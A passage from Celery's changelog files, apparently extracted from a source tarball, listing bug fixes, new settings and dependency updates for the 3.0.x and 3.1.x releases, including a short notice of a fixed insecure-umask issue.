example:: config = {'FOO': 10} app.add_defaults(config) is the same as ``app.conf.update(config)`` except that data won't be copied, and that it won't be pickled when the worker spawns child processes. In addition the method accepts a callable:: def initialize_config(): # insert heavy stuff that can't be done at import time here. app.add_defaults(initialize_config) which means the same as the above except that it won't happen until the Celery configuration is actually used. As an example, Celery can lazily use the configuration of a Flask app:: flask_app = Flask() app = Celery() app.add_defaults(lambda: flask_app.config) - Revoked tasks weren't marked as revoked in the result backend (Issue #871). Fix contributed by Hynek Schlawack. - Event-loop now properly handles the case when the :manpage:`epoll` poller object has been closed (Issue #882). - Fixed syntax error in ``funtests/test_leak.py`` Fix contributed by Catalin Iacob. - group/chunks: Now accepts empty task list (Issue #873). - New method names: - ``Celery.default_connection()`` ➠ :meth:`~@connection_or_acquire`. - ``Celery.default_producer()`` ➠ :meth:`~@producer_or_acquire`. The old names still work for backward compatibility. .. _version-3.0.3: 3.0.3 ===== :release-date: 2012-07-20 09:17 p.m. BST :release-by: Ask Solem - :pypi:`amqplib` passes the channel object as part of the delivery_info and it's not pickleable, so we now remove it. .. _version-3.0.2: 3.0.2 ===== :release-date: 2012-07-20 04:00 p.m. BST :release-by: Ask Solem - A bug caused the following task options to not take defaults from the configuration (Issue #867 + Issue #858) The following settings were affected: - :setting:`CELERY_IGNORE_RESULT` - :setting:`CELERYD_SEND_TASK_ERROR_EMAILS` - :setting:`CELERY_TRACK_STARTED` - :setting:`CElERY_STORE_ERRORS_EVEN_IF_IGNORED` Fix contributed by John Watson. - Task Request: ``delivery_info`` is now passed through as-is (Issue #807). - The ETA argument now supports datetime's with a timezone set (Issue #855). - The worker's banner displayed the autoscale settings in the wrong order (Issue #859). - Extension commands are now loaded after concurrency is set up so that they don't interfere with things like eventlet patching. - Fixed bug in the threaded pool (Issue #863) - The task failure handler mixed up the fields in :func:`sys.exc_info`. Fix contributed by Rinat Shigapov. - Fixed typos and wording in the docs. Fix contributed by Paul McMillan - New setting: :setting:`CELERY_WORKER_DIRECT` If enabled each worker will consume from their own dedicated queue which can be used to route tasks to specific workers. - Fixed several edge case bugs in the add consumer remote control command. - :mod:`~celery.contrib.migrate`: Can now filter and move tasks to specific workers if :setting:`CELERY_WORKER_DIRECT` is enabled. Among other improvements, the following functions have been added: * ``move_direct(filterfun, **opts)`` * ``move_direct_by_id(task_id, worker_hostname, **opts)`` * ``move_direct_by_idmap({task_id: worker_hostname, ...}, **opts)`` * ``move_direct_by_taskmap({task_name: worker_hostname, ...}, **opts)`` - :meth:`~celery.Celery.default_connection` now accepts a pool argument that if set to false causes a new connection to be created instead of acquiring one from the pool. - New signal: :signal:`celeryd_after_setup`. - Default loader now keeps lowercase attributes from the configuration module. .. _version-3.0.1: 3.0.1 ===== :release-date: 2012-07-10 06:00 p.m. BST :release-by: Ask Solem - Now depends on kombu 2.2.5 - inspect now supports limit argument:: myapp.control.inspect(limit=1).ping() - Beat: now works with timezone aware datetime's. - Task classes inheriting ``from celery import Task`` mistakenly enabled ``accept_magic_kwargs``. - Fixed bug in ``inspect scheduled`` (Issue #829). - Beat: Now resets the schedule to upgrade to UTC. - The :program:`celery worker` command now works with eventlet/gevent. Previously it wouldn't patch the environment early enough. - The :program:`celery` command now supports extension commands using setuptools entry-points. Libraries can add additional commands to the :program:`celery` command by adding an entry-point like:: setup( entry_points=[ 'celery.commands': [ 'foo = my.module:Command', ], ], ...) The command must then support the interface of :class:`celery.bin.base.Command`. - contrib.migrate: New utilities to move tasks from one queue to another. - :func:`~celery.contrib.migrate.move_tasks` - :func:`~celery.contrib.migrate.move_task_by_id` - The :event:`task-sent` event now contains ``exchange`` and ``routing_key`` fields. - Fixes bug with installing on Python 3. Fix contributed by Jed Smith. .. _version-3.0.0: 3.0.0 (Chiastic Slide) ====================== :release-date: 2012-07-07 01:30 p.m. BST :release-by: Ask Solem See :ref:`whatsnew-3.0`. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-3.1.rst0000664000175000017500000014620500000000000020316 0ustar00asifasif00000000000000.. _changelog-3.1: ================ Change history ================ This document contains change notes for bugfix releases in the 3.1.x series (Cipater), please see :ref:`whatsnew-3.1` for an overview of what's new in Celery 3.1. .. _version-3.1.26: 3.1.26 ====== :release-date: 2018-23-03 16:00 PM IST :release-by: Omer Katz - Fixed a crash caused by tasks cycling between Celery 3 and Celery 4 workers. .. _version-3.1.25: 3.1.25 ====== :release-date: 2016-10-10 12:00 PM PDT :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.37 ` - Fixed problem with chords in group introduced in 3.1.24 (Issue #3504). .. _version-3.1.24: 3.1.24 ====== :release-date: 2016-09-30 04:21 PM PDT :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.36 `. - Now supports Task protocol 2 from the future 4.0 release. Workers running 3.1.24 are now able to process messages sent using the `new task message protocol`_ to be introduced in Celery 4.0. Users upgrading to Celery 4.0 when this is released are encouraged to upgrade to this version as an intermediate step, as this means workers not yet upgraded will be able to process messages from clients/workers running 4.0. .. _`new task message protocol`: http://docs.celeryproject.org/en/master/internals/protocol.html#version-2 - ``Task.send_events`` can now be set to disable sending of events for that task only. Example when defining the task: .. code-block:: python @app.task(send_events=False) def add(x, y): return x + y - **Utils**: Fixed compatibility with recent :pypi:`psutil` versions (Issue #3262). - **Canvas**: Chord now forwards partial arguments to its subtasks. Fix contributed by Tayfun Sen. - **App**: Arguments to app such as ``backend``, ``broker``, etc are now pickled and sent to the child processes on Windows. Fix contributed by Jeremy Zafran. - **Deployment**: Generic init scripts now supports being symlinked in runlevel directories (Issue #3208). - **Deployment**: Updated CentOS scripts to work with CentOS 7. Contributed by Joe Sanford. - **Events**: The curses monitor no longer crashes when the result of a task is empty. Fix contributed by Dongweiming. - **Worker**: ``repr(worker)`` would crash when called early in the startup process (Issue #2514). - **Tasks**: GroupResult now defines __bool__ and __nonzero__. This is to fix an issue where a ResultSet or GroupResult with an empty result list are not properly tupled with the as_tuple() method when it is a parent result. This is due to the as_tuple() method performing a logical and operation on the ResultSet. Fix contributed by Colin McIntosh. - **Worker**: Fixed wrong values in autoscale related logging message. Fix contributed by ``@raducc``. - Documentation improvements by * Alexandru Chirila * Michael Aquilina * Mikko Ekström * Mitchel Humpherys * Thomas A. Neil * Tiago Moreira Vieira * Yuriy Syrovetskiy * ``@dessant`` .. _version-3.1.23: 3.1.23 ====== :release-date: 2016-03-09 06:00 P.M PST :release-by: Ask Solem - **Programs**: Last release broke support for the ``--hostnmame`` argument to :program:`celery multi` and :program:`celery worker --detach` (Issue #3103). - **Results**: MongoDB result backend could crash the worker at startup if not configured using an URL. .. _version-3.1.22: 3.1.22 ====== :release-date: 2016-03-07 01:30 P.M PST :release-by: Ask Solem - **Programs**: The worker would crash immediately on startup on ``backend.as_uri()`` when using some result backends (Issue #3094). - **Programs**: :program:`celery multi`/:program:`celery worker --detach` would create an extraneous logfile including literal formats (e.g. ``%I``) in the filename (Issue #3096). .. _version-3.1.21: 3.1.21 ====== :release-date: 2016-03-04 11:16 a.m. PST :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.34 `. - Now depends on :mod:`billiard` 3.3.0.23. - **Prefork pool**: Fixes 100% CPU loop on Linux :manpage:`epoll` (Issue #1845). Also potential fix for: Issue #2142, Issue #2606 - **Prefork pool**: Fixes memory leak related to processes exiting (Issue #2927). - **Worker**: Fixes crash at start-up when trying to censor passwords in MongoDB and Cache result backend URLs (Issue #3079, Issue #3045, Issue #3049, Issue #3068, Issue #3073). Fix contributed by Maxime Verger. - **Task**: An exception is now raised if countdown/expires is less than -2147483648 (Issue #3078). - **Programs**: :program:`celery shell --ipython` now compatible with newer :pypi:`IPython` versions. - **Programs**: The DuplicateNodeName warning emitted by inspect/control now includes a list of the node names returned. Contributed by Sebastian Kalinowski. - **Utils**: The ``.discard(item)`` method of :class:`~celery.utils.collections.LimitedSet` didn't actually remove the item (Issue #3087). Fix contributed by Dave Smith. - **Worker**: Node name formatting now emits less confusing error message for unmatched format keys (Issue #3016). - **Results**: RPC/AMQP backends: Fixed deserialization of JSON exceptions (Issue #2518). Fix contributed by Allard Hoeve. - **Prefork pool**: The `process inqueue damaged` error message now includes the original exception raised. - **Documentation**: Includes improvements by: - Jeff Widman. .. _version-3.1.20: 3.1.20 ====== :release-date: 2016-01-22 06:50 p.m. UTC :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.33 `. - Now depends on :mod:`billiard` 3.3.0.22. Includes binary wheels for Microsoft Windows x86 and x86_64! - **Task**: Error emails now uses ``utf-8`` character set by default (Issue #2737). - **Task**: Retry now forwards original message headers (Issue #3017). - **Worker**: Bootsteps can now hook into ``on_node_join``/``leave``/``lost``. See :ref:`extending-consumer-attributes` for an example. - **Events**: Fixed handling of DST timezones (Issue #2983). - **Results**: Redis backend stopped respecting certain settings. Contributed by Jeremy Llewellyn. - **Results**: Database backend now properly supports JSON exceptions (Issue #2441). - **Results**: Redis ``new_join`` didn't properly call task errbacks on chord error (Issue #2796). - **Results**: Restores Redis compatibility with Python :pypi:`redis` < 2.10.0 (Issue #2903). - **Results**: Fixed rare issue with chord error handling (Issue #2409). - **Tasks**: Using queue-name values in :setting:`CELERY_ROUTES` now works again (Issue #2987). - **General**: Result backend password now sanitized in report output (Issue #2812, Issue #2004). - **Configuration**: Now gives helpful error message when the result backend configuration points to a module, and not a class (Issue #2945). - **Results**: Exceptions sent by JSON serialized workers are now properly handled by pickle configured workers. - **Programs**: ``celery control autoscale`` now works (Issue #2950). - **Programs**: ``celery beat --detached`` now runs after fork callbacks. - **General**: Fix for LRU cache implementation on Python 3.5 (Issue #2897). Contributed by Dennis Brakhane. Python 3.5's ``OrderedDict`` doesn't allow mutation while it is being iterated over. This breaks "update" if it is called with a dict larger than the maximum size. This commit changes the code to a version that doesn't iterate over the dict, and should also be a little bit faster. - **Init-scripts**: The beat init-script now properly reports service as down when no pid file can be found. Eric Zarowny - **Beat**: Added cleaning of corrupted scheduler files for some storage backend errors (Issue #2985). Fix contributed by Aleksandr Kuznetsov. - **Beat**: Now syncs the schedule even if the schedule is empty. Fix contributed by Colin McIntosh. - **Supervisord**: Set higher process priority in the :pypi:`supervisord` example. Contributed by George Tantiras. - **Documentation**: Includes improvements by: :github_user:`Bryson` Caleb Mingle Christopher Martin Dieter Adriaenssens Jason Veatch Jeremy Cline Juan Rossi Kevin Harvey Kevin McCarthy Kirill Pavlov Marco Buttu :github_user:`Mayflower` Mher Movsisyan Michael Floering :github_user:`michael-k` Nathaniel Varona Rudy Attias Ryan Luckie Steven Parker :github_user:`squfrans` Tadej Janež TakesxiSximada Tom S .. _version-3.1.19: 3.1.19 ====== :release-date: 2015-10-26 01:00 p.m. UTC :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.29 `. - Now depends on :mod:`billiard` 3.3.0.21. - **Results**: Fixed MongoDB result backend URL parsing problem (Issue celery/kombu#375). - **Worker**: Task request now properly sets ``priority`` in delivery_info. Fix contributed by Gerald Manipon. - **Beat**: PyPy shelve may raise ``KeyError`` when setting keys (Issue #2862). - **Programs**: :program:`celery beat --deatched` now working on PyPy. Fix contributed by Krzysztof Bujniewicz. - **Results**: Redis result backend now ensures all pipelines are cleaned up. Contributed by Justin Patrin. - **Results**: Redis result backend now allows for timeout to be set in the query portion of the result backend URL. For example ``CELERY_RESULT_BACKEND = 'redis://?timeout=10'`` Contributed by Justin Patrin. - **Results**: ``result.get`` now properly handles failures where the exception value is set to :const:`None` (Issue #2560). - **Prefork pool**: Fixed attribute error ``proc.dead``. - **Worker**: Fixed worker hanging when gossip/heartbeat disabled (Issue #1847). Fix contributed by Aaron Webber and Bryan Helmig. - **Results**: MongoDB result backend now supports pymongo 3.x (Issue #2744). Fix contributed by Sukrit Khera. - **Results**: RPC/AMQP backends didn't deserialize exceptions properly (Issue #2691). Fix contributed by Sukrit Khera. - **Programs**: Fixed problem with :program:`celery amqp`'s ``basic_publish`` (Issue #2013). - **Worker**: Embedded beat now properly sets app for thread/process (Issue #2594). - **Documentation**: Many improvements and typos fixed. Contributions by: Carlos Garcia-Dubus D. Yu :github_user:`jerry` Jocelyn Delalande Josh Kupershmidt Juan Rossi :github_user:`kanemra` Paul Pearce Pavel Savchenko Sean Wang Seungha Kim Zhaorong Ma .. _version-3.1.18: 3.1.18 ====== :release-date: 2015-04-22 05:30 p.m. UTC :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.25 `. - Now depends on :mod:`billiard` 3.3.0.20. - **Django**: Now supports Django 1.8 (Issue #2536). Fix contributed by Bence Tamas and Mickaël Penhard. - **Results**: MongoDB result backend now compatible with pymongo 3.0. Fix contributed by Fatih Sucu. - **Tasks**: Fixed bug only happening when a task has multiple callbacks (Issue #2515). Fix contributed by NotSqrt. - **Commands**: Preload options now support ``--arg value`` syntax. Fix contributed by John Anderson. - **Compat**: A typo caused ``celery.log.setup_logging_subsystem`` to be undefined. Fix contributed by Gunnlaugur Thor Briem. - **init-scripts**: The beat generic init-script now uses :file:`/bin/sh` instead of :command:`bash` (Issue #2496). Fix contributed by Jelle Verstraaten. - **Django**: Fixed a :exc:`TypeError` sometimes occurring in logging when validating models. Fix contributed by Alexander. - **Commands**: Worker now supports new :option:`--executable ` argument that can be used with :option:`celery worker --detach`. Contributed by Bert Vanderbauwhede. - **Canvas**: Fixed crash in chord unlock fallback task (Issue #2404). - **Worker**: Fixed rare crash occurring with :option:`--autoscale ` enabled (Issue #2411). - **Django**: Properly recycle worker Django database connections when the Django ``CONN_MAX_AGE`` setting is enabled (Issue #2453). Fix contributed by Luke Burden. .. _version-3.1.17: 3.1.17 ====== :release-date: 2014-11-19 03:30 p.m. UTC :release-by: Ask Solem .. admonition:: Don't enable the `CELERYD_FORCE_EXECV` setting! Please review your configuration and disable this option if you're using the RabbitMQ or Redis transport. Keeping this option enabled after 3.1 means the async based prefork pool will be disabled, which can easily cause instability. - **Requirements** - Now depends on :ref:`Kombu 3.0.24 `. Includes the new Qpid transport coming in Celery 3.2, backported to support those who may still require Python 2.6 compatibility. - Now depends on :mod:`billiard` 3.3.0.19. - ``celery[librabbitmq]`` now depends on librabbitmq 1.6.1. - **Task**: The timing of ETA/countdown tasks were off after the example ``LocalTimezone`` implementation in the Python documentation no longer works in Python 3.4. (Issue #2306). - **Task**: Raising :exc:`~celery.exceptions.Ignore` no longer sends ``task-failed`` event (Issue #2365). - **Redis result backend**: Fixed unbound local errors. Fix contributed by Thomas French. - **Task**: Callbacks wasn't called properly if ``link`` was a list of signatures (Issue #2350). - **Canvas**: chain and group now handles json serialized signatures (Issue #2076). - **Results**: ``.join_native()`` would accidentally treat the ``STARTED`` state as being ready (Issue #2326). This could lead to the chord callback being called with invalid arguments when using chords with the :setting:`CELERY_TRACK_STARTED` setting enabled. - **Canvas**: The ``chord_size`` attribute is now set for all canvas primitives, making sure more combinations will work with the ``new_join`` optimization for Redis (Issue #2339). - **Task**: Fixed problem with app not being properly propagated to ``trace_task`` in all cases. Fix contributed by :github_user:`kristaps`. - **Worker**: Expires from task message now associated with a timezone. Fix contributed by Albert Wang. - **Cassandra result backend**: Fixed problems when using detailed mode. When using the Cassandra backend in detailed mode, a regression caused errors when attempting to retrieve results. Fix contributed by Gino Ledesma. - **Mongodb Result backend**: Pickling the backend instance will now include the original URL (Issue #2347). Fix contributed by Sukrit Khera. - **Task**: Exception info wasn't properly set for tasks raising :exc:`~celery.exceptions.Reject` (Issue #2043). - **Worker**: Duplicates are now removed when loading the set of revoked tasks from the worker state database (Issue #2336). - **celery.contrib.rdb**: Fixed problems with ``rdb.set_trace`` calling stop from the wrong frame. Fix contributed by :github_user:`llllllllll`. - **Canvas**: ``chain`` and ``chord`` can now be immutable. - **Canvas**: ``chord.apply_async`` will now keep partial args set in ``self.args`` (Issue #2299). - **Results**: Small refactoring so that results are decoded the same way in all result backends. - **Logging**: The ``processName`` format was introduced in Python 2.6.2 so for compatibility this format is now excluded when using earlier versions (Issue #1644). .. _version-3.1.16: 3.1.16 ====== :release-date: 2014-10-03 06:00 p.m. UTC :release-by: Ask Solem - **Worker**: 3.1.15 broke :option:`-Ofair ` behavior (Issue #2286). This regression could result in all tasks executing in a single child process if ``-Ofair`` was enabled. - **Canvas**: ``celery.signature`` now properly forwards app argument in all cases. - **Task**: ``.retry()`` didn't raise the exception correctly when called without a current exception. Fix contributed by Andrea Rabbaglietti. - **Worker**: The ``enable_events`` remote control command disabled worker-related events by mistake (Issue #2272). Fix contributed by Konstantinos Koukopoulos. - **Django**: Adds support for Django 1.7 class names in INSTALLED_APPS when using ``app.autodiscover_tasks()`` (Issue #2248). - **Sphinx**: ``celery.contrib.sphinx`` now uses ``getfullargspec`` on Python 3 (Issue #2302). - **Redis/Cache Backends**: Chords will now run at most once if one or more tasks in the chord are executed multiple times for some reason. .. _version-3.1.15: 3.1.15 ====== :release-date: 2014-09-14 11:00 p.m. UTC :release-by: Ask Solem - **Django**: Now makes sure ``django.setup()`` is called before importing any task modules (Django 1.7 compatibility, Issue #2227) - **Results**: ``result.get()`` was misbehaving by calling ``backend.get_task_meta`` in a :keyword:`finally` call leading to AMQP result backend queues not being properly cleaned up (Issue #2245). .. _version-3.1.14: 3.1.14 ====== :release-date: 2014-09-08 03:00 p.m. UTC :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 3.0.22 `. - **Init-scripts**: The generic worker init-scripts ``status`` command now gets an accurate pidfile list (Issue #1942). - **Init-scripts**: The generic beat script now implements the ``status`` command. Contributed by John Whitlock. - **Commands**: Multi now writes informational output to stdout instead of stderr. - **Worker**: Now ignores not implemented error for ``pool.restart`` (Issue #2153). - **Task**: Retry no longer raises retry exception when executed in eager mode (Issue #2164). - **AMQP Result backend**: Now ensured ``on_interval`` is called at least every second for blocking calls to properly propagate parent errors. - **Django**: Compatibility with Django 1.7 on Windows (Issue #2126). - **Programs**: :option:`--umask ` argument can now be specified in both octal (if starting with 0) or decimal. .. _version-3.1.13: 3.1.13 ====== Security Fixes -------------- * [Security: `CELERYSA-0002`_] Insecure default umask. The built-in utility used to daemonize the Celery worker service sets an insecure umask by default (umask 0). This means that any files or directories created by the worker will end up having world-writable permissions. Special thanks to Red Hat for originally discovering and reporting the issue! This version will no longer set a default umask by default, so if unset the umask of the parent process will be used. .. _`CELERYSA-0002`: https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0002.txt News ---- - **Requirements** - Now depends on :ref:`Kombu 3.0.21 `. - Now depends on :mod:`billiard` 3.3.0.18. - **App**: ``backend`` argument now also sets the :setting:`CELERY_RESULT_BACKEND` setting. - **Task**: ``signature_from_request`` now propagates ``reply_to`` so that the RPC backend works with retried tasks (Issue #2113). - **Task**: ``retry`` will no longer attempt to re-queue the task if sending the retry message fails. Unrelated exceptions being raised could cause a message loop, so it was better to remove this behavior. - **Beat**: Accounts for standard 1ms drift by always waking up 0.010s earlier. This will adjust the latency so that the periodic tasks won't move 1ms after every invocation. - Documentation fixes Contributed by Yuval Greenfield, Lucas Wiman, :github_user:`nicholsonjf`. - **Worker**: Removed an outdated assert statement that could lead to errors being masked (Issue #2086). .. _version-3.1.12: 3.1.12 ====== :release-date: 2014-06-09 10:12 p.m. UTC :release-by: Ask Solem - **Requirements** Now depends on :ref:`Kombu 3.0.19 `. - **App**: Connections weren't being closed after fork due to an error in the after fork handler (Issue #2055). This could manifest itself by causing framing errors when using RabbitMQ. (``Unexpected frame``). - **Django**: ``django.setup()`` was being called too late when using Django 1.7 (Issue #1802). - **Django**: Fixed problems with event timezones when using Django (``Substantial drift``). Celery didn't take into account that Django modifies the ``time.timeone`` attributes and friends. - **Canvas**: ``Signature.link`` now works when the link option is a scalar value (Issue #2019). - **Prefork pool**: Fixed race conditions for when file descriptors are removed from the event loop. Fix contributed by Roger Hu. - **Prefork pool**: Improved solution for dividing tasks between child processes. This change should improve performance when there are many child processes, and also decrease the chance that two subsequent tasks are written to the same child process. - **Worker**: Now ignores unknown event types, instead of crashing. Fix contributed by Illes Solt. - **Programs**: :program:`celery worker --detach` no longer closes open file descriptors when :envvar:`C_FAKEFORK` is used so that the workers output can be seen. - **Programs**: The default working directory for :program:`celery worker --detach` is now the current working directory, not ``/``. - **Canvas**: ``signature(s, app=app)`` didn't upgrade serialized signatures to their original class (``subtask_type``) when the ``app`` keyword argument was used. - **Control**: The ``duplicate nodename`` warning emitted by control commands now shows the duplicate node name. - **Tasks**: Can now call ``ResultSet.get()`` on a result set without members. Fix contributed by Alexey Kotlyarov. - **App**: Fixed strange traceback mangling issue for ``app.connection_or_acquire``. - **Programs**: The :program:`celery multi stopwait` command is now documented in usage. - **Other**: Fixed cleanup problem with ``PromiseProxy`` when an error is raised while trying to evaluate the promise. - **Other**: The utility used to censor configuration values now handles non-string keys. Fix contributed by Luke Pomfrey. - **Other**: The ``inspect conf`` command didn't handle non-string keys well. Fix contributed by Jay Farrimond. - **Programs**: Fixed argument handling problem in :program:`celery worker --detach`. Fix contributed by Dmitry Malinovsky. - **Programs**: :program:`celery worker --detach` didn't forward working directory option (Issue #2003). - **Programs**: :program:`celery inspect registered` no longer includes the list of built-in tasks. - **Worker**: The ``requires`` attribute for boot steps weren't being handled correctly (Issue #2002). - **Eventlet**: The eventlet pool now supports the ``pool_grow`` and ``pool_shrink`` remote control commands. Contributed by Mher Movsisyan. - **Eventlet**: The eventlet pool now implements statistics for :program:``celery inspect stats``. Contributed by Mher Movsisyan. - **Documentation**: Clarified ``Task.rate_limit`` behavior. Contributed by Jonas Haag. - **Documentation**: ``AbortableTask`` examples now updated to use the new API (Issue #1993). - **Documentation**: The security documentation examples used an out of date import. Fix contributed by Ian Dees. - **Init-scripts**: The CentOS init-scripts didn't quote :envvar:`CELERY_CHDIR`. Fix contributed by :github_user:`ffeast`. .. _version-3.1.11: 3.1.11 ====== :release-date: 2014-04-16 11:00 p.m. UTC :release-by: Ask Solem - **Now compatible with RabbitMQ 3.3.0** You need to run Celery 3.1.11 or later when using RabbitMQ 3.3, and if you use the ``librabbitmq`` module you also have to upgrade to librabbitmq 1.5.0: .. code-block:: bash $ pip install -U librabbitmq - **Requirements**: - Now depends on :ref:`Kombu 3.0.15 `. - Now depends on `billiard 3.3.0.17`_. - Bundle ``celery[librabbitmq]`` now depends on :mod:`librabbitmq` 1.5.0. .. _`billiard 3.3.0.17`: https://github.com/celery/billiard/blob/master/CHANGES.txt - **Tasks**: The :setting:`CELERY_DEFAULT_DELIVERY_MODE` setting was being ignored (Issue #1953). - **Worker**: New :option:`celery worker --heartbeat-interval` can be used to change the time (in seconds) between sending event heartbeats. Contributed by Matthew Duggan and Craig Northway. - **App**: Fixed memory leaks occurring when creating lots of temporary app instances (Issue #1949). - **MongoDB**: SSL configuration with non-MongoDB transport breaks MongoDB results backend (Issue #1973). Fix contributed by Brian Bouterse. - **Logging**: The color formatter accidentally modified ``record.msg`` (Issue #1939). - **Results**: Fixed problem with task trails being stored multiple times, causing ``result.collect()`` to hang (Issue #1936, Issue #1943). - **Results**: ``ResultSet`` now implements a ``.backend`` attribute for compatibility with ``AsyncResult``. - **Results**: ``.forget()`` now also clears the local cache. - **Results**: Fixed problem with multiple calls to ``result._set_cache`` (Issue #1940). - **Results**: ``join_native`` populated result cache even if disabled. - **Results**: The YAML result serializer should now be able to handle storing exceptions. - **Worker**: No longer sends task error emails for expected errors (in ``@task(throws=(..., )))``. - **Canvas**: Fixed problem with exception deserialization when using the JSON serializer (Issue #1987). - **Eventlet**: Fixes crash when ``celery.contrib.batches`` attempted to cancel a non-existing timer (Issue #1984). - Can now import ``celery.version_info_t``, and ``celery.five`` (Issue #1968). .. _version-3.1.10: 3.1.10 ====== :release-date: 2014-03-22 09:40 p.m. UTC :release-by: Ask Solem - **Requirements**: - Now depends on :ref:`Kombu 3.0.14 `. - **Results**: Reliability improvements to the SQLAlchemy database backend. Previously the connection from the MainProcess was improperly shared with the workers. (Issue #1786) - **Redis:** Important note about events (Issue #1882). There's a new transport option for Redis that enables monitors to filter out unwanted events. Enabling this option in the workers will increase performance considerably: .. code-block:: python BROKER_TRANSPORT_OPTIONS = {'fanout_patterns': True} Enabling this option means that your workers won't be able to see workers with the option disabled (or is running an older version of Celery), so if you do enable it then make sure you do so on all nodes. See :ref:`redis-caveats`. This will be the default in Celery 3.2. - **Results**: The :class:`@AsyncResult` object now keeps a local cache of the final state of the task. This means that the global result cache can finally be disabled, and you can do so by setting :setting:`CELERY_MAX_CACHED_RESULTS` to :const:`-1`. The lifetime of the cache will then be bound to the lifetime of the result object, which will be the default behavior in Celery 3.2. - **Events**: The "Substantial drift" warning message is now logged once per node name only (Issue #1802). - **Worker**: Ability to use one log file per child process when using the prefork pool. This can be enabled by using the new ``%i`` and ``%I`` format specifiers for the log file name. See :ref:`worker-files-process-index`. - **Redis**: New experimental chord join implementation. This is an optimization for chords when using the Redis result backend, where the join operation is now considerably faster and using less resources than the previous strategy. The new option can be set in the result backend URL: .. code-block:: python CELERY_RESULT_BACKEND = 'redis://localhost?new_join=1' This must be enabled manually as it's incompatible with workers and clients not using it, so be sure to enable the option in all clients and workers if you decide to use it. - **Multi**: With ``-opt:index`` (e.g., ``-c:1``) the index now always refers to the position of a node in the argument list. This means that referring to a number will work when specifying a list of node names and not just for a number range: .. code-block:: bash celery multi start A B C D -c:1 4 -c:2-4 8 In this example ``1`` refers to node A (as it's the first node in the list). - **Signals**: The sender argument to ``Signal.connect`` can now be a proxy object, which means that it can be used with the task decorator (Issue #1873). - **Task**: A regression caused the ``queue`` argument to ``Task.retry`` to be ignored (Issue #1892). - **App**: Fixed error message for :meth:`~@Celery.config_from_envvar`. Fix contributed by Dmitry Malinovsky. - **Canvas**: Chords can now contain a group of other chords (Issue #1921). - **Canvas**: Chords can now be combined when using the amqp result backend (a chord where the callback is also a chord). - **Canvas**: Calling ``result.get()`` for a chain task will now complete even if one of the tasks in the chain is ``ignore_result=True`` (Issue #1905). - **Canvas**: Worker now also logs chord errors. - **Canvas**: A chord task raising an exception will now result in any errbacks (``link_error``) to the chord callback to also be called. - **Results**: Reliability improvements to the SQLAlchemy database backend (Issue #1786). Previously the connection from the ``MainProcess`` was improperly inherited by child processes. Fix contributed by Ionel Cristian Mărieș. - **Task**: Task callbacks and errbacks are now called using the group primitive. - **Task**: ``Task.apply`` now properly sets ``request.headers`` (Issue #1874). - **Worker**: Fixed :exc:`UnicodeEncodeError` occurring when worker is started by :pypi:`supervisor`. Fix contributed by Codeb Fan. - **Beat**: No longer attempts to upgrade a newly created database file (Issue #1923). - **Beat**: New setting :setting:``CELERYBEAT_SYNC_EVERY`` can be be used to control file sync by specifying the number of tasks to send between each sync. Contributed by Chris Clark. - **Commands**: :program:`celery inspect memdump` no longer crashes if the :mod:`psutil` module isn't installed (Issue #1914). - **Worker**: Remote control commands now always accepts json serialized messages (Issue #1870). - **Worker**: Gossip will now drop any task related events it receives by mistake (Issue #1882). .. _version-3.1.9: 3.1.9 ===== :release-date: 2014-02-10 06:43 p.m. UTC :release-by: Ask Solem - **Requirements**: - Now depends on :ref:`Kombu 3.0.12 `. - **Prefork pool**: Better handling of exiting child processes. Fix contributed by Ionel Cristian Mărieș. - **Prefork pool**: Now makes sure all file descriptors are removed from the hub when a process is cleaned up. Fix contributed by Ionel Cristian Mărieș. - **New Sphinx extension**: for autodoc documentation of tasks: :mod:`celery.contrib.spinx` (Issue #1833). - **Django**: Now works with Django 1.7a1. - **Task**: Task.backend is now a property that forwards to ``app.backend`` if no custom backend has been specified for the task (Issue #1821). - **Generic init-scripts**: Fixed bug in stop command. Fix contributed by Rinat Shigapov. - **Generic init-scripts**: Fixed compatibility with GNU :manpage:`stat`. Fix contributed by Paul Kilgo. - **Generic init-scripts**: Fixed compatibility with the minimal :program:`dash` shell (Issue #1815). - **Commands**: The :program:`celery amqp basic.publish` command wasn't working properly. Fix contributed by Andrey Voronov. - **Commands**: Did no longer emit an error message if the pidfile exists and the process is still alive (Issue #1855). - **Commands**: Better error message for missing arguments to preload options (Issue #1860). - **Commands**: :program:`celery -h` didn't work because of a bug in the argument parser (Issue #1849). - **Worker**: Improved error message for message decoding errors. - **Time**: Now properly parses the `Z` timezone specifier in ISO 8601 date strings. Fix contributed by Martin Davidsson. - **Worker**: Now uses the *negotiated* heartbeat value to calculate how often to run the heartbeat checks. - **Beat**: Fixed problem with beat hanging after the first schedule iteration (Issue #1822). Fix contributed by Roger Hu. - **Signals**: The header argument to :signal:`before_task_publish` is now always a dictionary instance so that signal handlers can add headers. - **Worker**: A list of message headers is now included in message related errors. .. _version-3.1.8: 3.1.8 ===== :release-date: 2014-01-17 10:45 p.m. UTC :release-by: Ask Solem - **Requirements**: - Now depends on :ref:`Kombu 3.0.10 `. - Now depends on `billiard 3.3.0.14`_. .. _`billiard 3.3.0.14`: https://github.com/celery/billiard/blob/master/CHANGES.txt - **Worker**: The event loop wasn't properly reinitialized at consumer restart which would force the worker to continue with a closed ``epoll`` instance on Linux, resulting in a crash. - **Events:** Fixed issue with both heartbeats and task events that could result in the data not being kept in sorted order. As a result this would force the worker to log "heartbeat missed" events even though the remote node was sending heartbeats in a timely manner. - **Results:** The pickle serializer no longer converts group results to tuples, and will keep the original type (*Issue #1750*). - **Results:** ``ResultSet.iterate`` is now pending deprecation. The method will be deprecated in version 3.2 and removed in version 3.3. Use ``result.get(callback=)`` (or ``result.iter_native()`` where available) instead. - **Worker**\|eventlet/gevent: A regression caused :kbd:`Control-c` to be ineffective for shutdown. - **Redis result backend:** Now using a pipeline to store state changes for improved performance. Contributed by Pepijn de Vos. - **Redis result backend:** Will now retry storing the result if disconnected. - **Worker**\|gossip: 